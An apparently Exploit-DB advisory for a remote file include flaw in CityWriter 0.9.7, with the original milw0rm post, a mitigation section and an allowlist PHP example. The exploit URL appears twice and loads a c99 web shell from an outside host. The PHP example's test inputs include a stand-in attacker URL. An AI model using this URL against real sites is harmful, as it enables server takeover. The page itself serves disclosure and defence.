Vendor: CityWriter
By: RoMaNcYxHaCkEr
CVSS: N/A
Vulnerability type: Remote File Include
CWE: Unknown
Product Name: CityWriter
Affected Version From: 2000.9.7
Affected Version To: 2000.9.7
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Platforms Tested: Unknown
2007

CityWriter 0.9.7 Remote File Include

The vulnerability is in the 'head.php' file, where the 'path' parameter is passed to the 'include' function without proper validation. An attacker can exploit this by supplying a remote file URL in the 'path' parameter, and the application will include and execute that file. In this case, the exploit URL is 'Www.RxH.com/citywriter/head.php?path=http://www.no-hack.fr/shells/c99.txt?'

Mitigation:

To mitigate this vulnerability, the application should validate and sanitize user input before using it in the 'include' function. Additionally, the application should use a whitelist approach, allowing only specific files to be included.
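
One way to apply the whitelist approach described above, as an added example that is not CityWriter's code: the request value selects a key from a fixed table and the resolved file must lie inside the chosen directory. The names ALLOWED_DIRS and resolve_include() and the 'admin' directory are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example, not CityWriter's code. The original head.php line was:
//   <? include($path."topbar.php"); ?>
// ALLOWED_DIRS and resolve_include() are hypothetical names.

// Allowlist: the request picks a key, never a path or a URL.
const ALLOWED_DIRS = [
    'default' => __DIR__ . '/',
    'admin'   => __DIR__ . '/admin/',   // hypothetical second template directory
];

function resolve_include($key, string $file, array $allowed = ALLOWED_DIRS): ?string
{
    // Arrays, URLs, "../" sequences and empty values are all unknown keys.
    if (!is_string($key) || !array_key_exists($key, $allowed)) {
        return null;
    }
    $base = realpath($allowed[$key]);
    $full = realpath($allowed[$key] . $file);
    if ($base === false || $full === false) {
        return null;                    // directory or file does not exist locally
    }
    // Containment check: the resolved file must sit inside the allowlisted directory.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Constructed sample inputs. This script's own file name stands in for
// topbar.php so the demo resolves without any other files present.
$samples = ['default', 'http://attacker.example/shell.txt?', '../../etc/', ''];
foreach ($samples as $key) {
    $target = resolve_include($key, basename(__FILE__));
    printf("%-40s => %s\n", var_export($key, true), $target ?? 'rejected');
}

// In head.php itself the call would look like this:
//   $target = resolve_include($_GET['path'] ?? 'default', 'topbar.php');
//   if ($target === null) { http_response_code(400); exit; }
//   include $target;
```

With allow_url_include left off in php.ini, PHP also refuses URL targets in include on its own, independent of this check.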

Exploit-DB raw data:

# Name : CityWriter 0.9.7 Remote File Include
# Download From :
http://download.hulihanapplications.com/citywriter/citywriter-0.97.zip
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulnerable Code In File head.php In Line 1:
<? include($path."topbar.php"); ?>
# Exploit :
Www.RxH.com/citywriter/head.php?path=http://www.no-hack.fr/shells/c99.txt?
============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , Dr- Wolf4ever And All My Friends
# For Contact : RxH@HotMail.iT
Best Wishes

# milw0rm.com [2007-12-13]